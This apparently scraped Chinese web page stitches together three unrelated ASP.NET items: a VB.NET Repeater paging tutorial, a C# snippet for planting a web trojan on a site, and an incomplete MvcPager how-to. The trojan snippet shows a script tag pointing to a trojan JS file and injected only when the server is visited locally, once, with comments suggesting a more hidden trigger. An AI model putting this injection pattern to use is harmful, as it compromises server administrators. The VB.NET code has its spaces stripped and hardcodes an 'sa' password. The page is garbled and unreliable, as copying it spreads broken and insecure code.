一 : ASP.NET程序中用Repeater实现分页
文/waterswea
一、程序功能:为Repeater实现分页
二、窗体设计:
1、新建ASP.NETWeb应用程序,命名为Repeater2,保存路径为http://192.168.0.1/Repeater2(注:我机子上的网站的IP是192.168.0.1的主目录是D:web文件夹)然后点击确定。
2、向窗体添加一个3行一列的表,向表的第一行中添加一个Repeater控件,向表的第二行中添加两个Label控件向表的第三行中添加四个Button按钮。
3、切换到HTML代码窗口,在<asp:Repeaterid="Repeater1"runat="server">和</asp:Repeater>之间添加以下代码:
<ItemTemplate>
<tableid="Table2"style="FONT-SIZE:x-small"width="498">
<tr>
<td><%#DataBinder.Eval(Container,"DataItem.employeeid")%></td>
<td><%#DataBinder.Eval(Container,"DataItem.lastname")%></td>
</tr>
</table>
</ItemTemplate>
三、代码设计:
ImportsSystem.Data.SqlClient
PublicClassWebForm1
InheritsSystem.Web.UI.Page
DimsconAsNewSqlConnection("server=localhost;database=northwind;uid=sa;pwd=123")
DimsDAAsSqlDataAdapter
DimdsAsDataSet
DimcurrentPageAsInteger'记录着目前在哪一页上
DimmaxPageAsInteger'总共有多少页
ConstrowCountAsInteger=3'一页有多少行
DimrowSumAsInteger'总共有多少行
'窗体代码省略
PrivateSubPage_Load(ByValsenderAsSystem.Object,ByValeAsSystem.EventArgs)HandlesMyBase.Load
IfNotPage.IsPostBackThen
sDA=NewSqlDataAdapter("selectemployeeid,lastnamefromemployeesorderbyemployeeid",scon)
ds=NewDataSet
Try
sDA.Fill(ds,"employees")
'获取总共有多少行
rowSum=ds.Tables(0).Rows.Count
CatchexAsException
rowSum=0
EndTry
'如果没有数据,退出过程
IfrowSum=0ThenExitSub
'计算出浏览数据的总页数
IfrowSumModrowCount>0Then
'有余数要加1
maxPage=rowSumrowCount+1
Else
'正好除尽
maxPage=rowSumrowCount
EndIf
currentPage=1
'调用绑定数据过程
readpage(currentPage)
BindData()
Label2.Text=maxPage
'首页和上一页按钮不可见
Button1.Visible=False
Button2.Visible=False
EndIf
EndSub
'创建一个绑定数据的过程
SubBindData()
Repeater1.DataSource=ds
Repeater1.DataBind()
Label1.Text=currentPage
EndSub
'创建一个填充数据集的过程
Subreadpage(ByValnAsInteger)
sDA=NewSqlDataAdapter("selectemployeeid,lastnamefromemployeesorderbyemployeeid",scon)
ds=NewDataSet
ds.Clear()
sDA.Fill(ds,(n-1)*rowCount,rowCount,"employees")
EndSub
'首页按钮
PrivateSubButton1_Click(ByValsenderAsSystem.Object,ByValeAsSystem.EventArgs)HandlesButton1.Click
currentPage=1
'调用填充数据集过程
readpage(currentPage)
'绑定数据
BindData()
'设置首页、第一页按钮不可见,显示下一页尾页按钮
Button1.Visible=False
Button2.Visible=False
Button3.Visible=True
Button4.Visible=True
EndSub
'上一页按钮
PrivateSubButton2_Click(ByValsenderAsSystem.Object,ByValeAsSystem.EventArgs)HandlesButton2.Click
'如果现在页是第二页,设置首页和上一页按钮不可见
IfLabel1.Text>2Then
Button3.Visible=True
Button4.Visible=True
Else
Button1.Visible=False
Button2.Visible=False
Button3.Visible=True
Button4.Visible=True
EndIf
currentPage=Label1.Text-1
readpage(currentPage)
BindData()
EndSub
'下一页按钮
PrivateSubButton3_Click(ByValsenderAsSystem.Object,ByValeAsSystem.EventArgs)HandlesButton3.Click
'如果现在页倒数第二页,设置最后页和下一页按钮不可见
IfLabel1.Text<Label2.Text-1Then
Button1.Visible=True
Button2.Visible=True
Else
Button1.Visible=True
Button2.Visible=True
Button3.Visible=False
Button4.Visible=False
EndIf
currentPage=Label1.Text+1
readpage(currentPage)
BindData()
EndSub
'尾页按钮
PrivateSubButton4_Click(ByValsenderAsSystem.Object,ByValeAsSystem.EventArgs)HandlesButton4.Click
'设置当前页为最大页数
currentPage=Label2.Text
readpage(currentPage)
BindData()
Button1.Visible=True
Button2.Visible=True
Button3.Visible=False
Button4.Visible=False
EndSub
EndClass
窗体界面如下所示:
二 : asp.net 利用网页挂马拿服务器的一种设想
步骤如下:
if(Request.IsLocal)//判断是否本机访问,当然你可以改为更好的判断方法
{
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))//是否第一次访问的标志,这里为了简单,使用的配置文件,你可以修改为其他更隐蔽的方法
{
Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
config.AppSettings.Settings["sitecode"].Value="1";
config.Save();
Response.Write("<script language="javascript" src="木马js文件路径" ></script>");
//发送成功提示的代码
}
//正常执行的代码
}
else
if(Request.IsLocal)//判断是否本机访问,当然你可以改为更好的判断方法
{
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))//是否第一次访问的标志,这里为了简单,使用的配置文件,你可以修改为其他更隐蔽的方法
{
Configuration config = ConfigurationManager.OpenExeConfiguration(ConfigurationUserLevel.None);
config.AppSettings.Settings["sitecode"].Value="1";
config.Save();
Response.Write("<script language="javascript" src="木马js文件路径" ></script>");
//发送成功提示的代码
}
}
if(ConfigurationManager.AppSettings["sitecode"].Equals("0"))
Response.Close();
//正常执行的代码
三 : ASP.NET MVC分页控件
1、下载MvcPager.dll文件并引用到MVC项目中
2、在控制器中引用命名空间using Webdiyer.WebControls.Mvc;
3、获取数据集合,数据的总记录数(数据集合有多少条数据),设置每页记录数多少(每页显示多少条数据),获取当前页码(当前第几页)
例如:
4、创建视图,将换成
5、在web.config中的
6、在显示的数据下面
@Html.Pager(Model, new PagerOptions() { AlwaysShowFirstLastPageNumber = true , PageIndexParameterName = "Page", AutoHide=false})
7、结束
以上就是本文的全部内容,希望本文的内容对大家的学习或者工作能带来一定的帮助,同时也希望多多支持61阅读!
本文标题:asp.net网页制作-ASP.NET程序中用Repeater实现分页61阅读| 精彩专题| 最新文章| 热门文章| 苏ICP备13036349号-1